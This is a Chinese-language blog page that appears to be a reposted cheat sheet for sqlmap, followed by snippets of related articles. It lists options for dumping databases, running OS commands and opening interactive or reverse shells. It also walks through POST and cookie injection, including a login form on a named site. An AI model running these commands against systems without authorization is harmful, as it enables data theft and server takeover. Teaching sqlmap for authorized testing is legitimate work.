SQLMAP用法

基本用法:

  --dbs  查询数据库

  --current--db  获取当前数据库名称

  --current--user 获得用户

  --tables -D “数据库”   // 列举数据库的表名

  --columns -T “表名” -D “数据库”   // 获取表的列名

  --dump -C “字段,字段” -T “表名” -D “数据库” // 获取表中的数据,包含列

  –privileges / 查看权限

  privileges -U root / 查看用户权限

  –roles / 枚举数据库用户角色

  --proxy "http://127.0.0.1:8080" 代理注入

  --sql-query=xx 要执行的SQL语句

  --sql-shell 提示交互式 SQL 的 shell

  --os-cmd=xxx执行操作系统命令
  --os-shell 交互式的操作系统的 shell
  --os-pwn 反弹shell
  --reg-read 读取win系统注册表
  --dbs-o "sqlmap.log" 保存进度
  --dbs-o "sqlmap.log" -resume 恢复已保存进度

POST注入  

  1. 浏览器打开目标地址http:// blog.websafe3.org /Login.asp
  2. 配置burp代理(127.0.0.1:8080)以拦截请求
  3. 点击login表单的submit按钮
  4. 这时候Burp会拦截到了我们的登录POST请求
  5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下

  6. 运行sqlmap并使用如下命令:

  ./sqlmap.py -r search-test.txt -p tfUPass  

  这里参数-r 是让sqlmap加载我们的post请求rsearch-test.txt,
  而-p 大家应该比较熟悉,指定注入用的参数。

COOKIES注入

  sqlmap.py -u "http://127.0.0.1/base.php" --cookies "id=1" --dbs --level 2

  默认情况下SQLMAP只支持GET/POST参数的注入测试,但是当使用--level 参数且数值>=2的时候也会检查 cookie时面的参数,当>=3的时候将检查User-agent和Referer,那么这就很简单了,我们直接在原有的基础上面加上 --level 2 即可

原文地址:https://www.cnblogs.com/pangya/p/8915692.html

时间: 2024-09-20 08:33:36

SQLMAP用法的相关文章

SQLMAP 注射工具用法

1 . 介绍1.1 要求 1.2 网应用情节 1.3 SQL 射入技术 1.4 特点 1.5 下载和更新sqlmap 1.6 执照 2 . 用法2.1 帮助 2.2 目标URL 2.3 目标URL 和verbosity 2.4 URL 参量 2.5 Google dork 2.6 HTTP 方法: 得到或张贴 2.7 张贴的数据串 2.8 HTTP 曲奇饼倒栽跳水 2.9 HTTP 用户代理倒栽跳水 2.10 任意HTTP 用户代理倒栽跳水 2.11 HTTP 认证 2.12 HTTP 代理人 

sqlmap 详细用法

1. 基础用法: ./sqlmap.py -u "注入地址" -v 1 –dbs   // 列举数据库./sqlmap.py -u "注入地址" -v 1 –current-db   // 当前数据库./sqlmap.py -u "注入地址" -v 1 –users    // 列数据库用户./sqlmap.py -u "注入地址" -v 1 –current-user  // 当前用户./sqlmap.py -u "

Pikahu-SQL注入模块和sqlmap经典用法

sql注入漏洞 危害是最大得 sql注入类型:  数字型  user_id=$id 字符型 user_id='$id' 搜索型  text like '%{$_GET['search']}'  " select  字段1  from table  where  id=1  会显示表中第一行信息 select  字段1  from table  where  id=1 or 1=1  会显示表中所有信息 1.数字型注入 post . 抓包如下   查看代码,发现代码对id没有做任何过滤 2.字符型

使用SQLMAP对网站和数据库进行SQL注入攻击

from:http://www.blackmoreops.com/2014/05/07/use-sqlmap-sql-injection-hack-website-database/ 0x00 背景介绍 1. 什么是SQL注入? SQL注入是一种代码注入技术,过去常常用于攻击数据驱动性的应用,比如将恶意的SQL代码注入到特定字段用于实施拖库攻击等.SQL注入的成功必须借助应用程序的安全漏洞,例如用户输入没有经过正确地过滤(针对某些特定字符串)或者没有特别强调类型的时候,都容易造成异常地执行SQL

通过BurpSuite和sqlmap配合对dvwa进行sql注入测试和用户名密码暴力破解

0x1:工具和环境介绍 dvwa:渗透测试环境 BurpSuite:强大的WEB安全测试工具 sqlmap:强大的sql注入工具 以上工具和环境都在kali linux上安装和配置. 0x2:步骤说明 配置Burp Suite和浏览器. 这一步比较简单,主要是用来抓取用来sql注入的信息. 在Burp中设置proxy代理:127.0.0.1:8080,配置浏览器使用代理,这样浏览器的request信息就可以被Burp抓取了. 抓取登录信息 在Burp的Proxy界面可以抓取到浏览器访问的信息,如

sqlmap翻译之sqlmap介绍(一)

sqlmap sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate p

SQLMAP大全

转自:http://blog.csdn.net/zsf1235/article/details/50974194 本人小白,初次认识sqlmap,很多都是转载资料,只是学习研究一下! 练习的网站可以用谷歌搜一下:   cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables                sqlmap.py -u

注入神器-sqlmap

此文章写的不错: http://pnig0s1992.blog.51cto.com/393390/402775 推荐 sqlmap 官网:http://sqlmap.org/ https://github.com/sqlmapproject/sqlmap/zipball/master sqlmap 的运行需要python环境. 直接到官网下载安装即可. 下载 2.7.8 版本,链接如下: https://www.python.org/downloads/release/python-278/ 简

sqlmap 命令详解(自备速查)

sqlmap速查 /pentest/database/sqlmap/txt/ common-columns.txt 字段字典 common-outputs.txt common-tables.txt 表字典 keywords.txt oracle-default-passwords.txt user-agents.txt wordlist.txt 常用语句: 1.使用POST方法提交 sqlmap.py -u "http://192.168.1.1/sqlmap/oracle/post_int.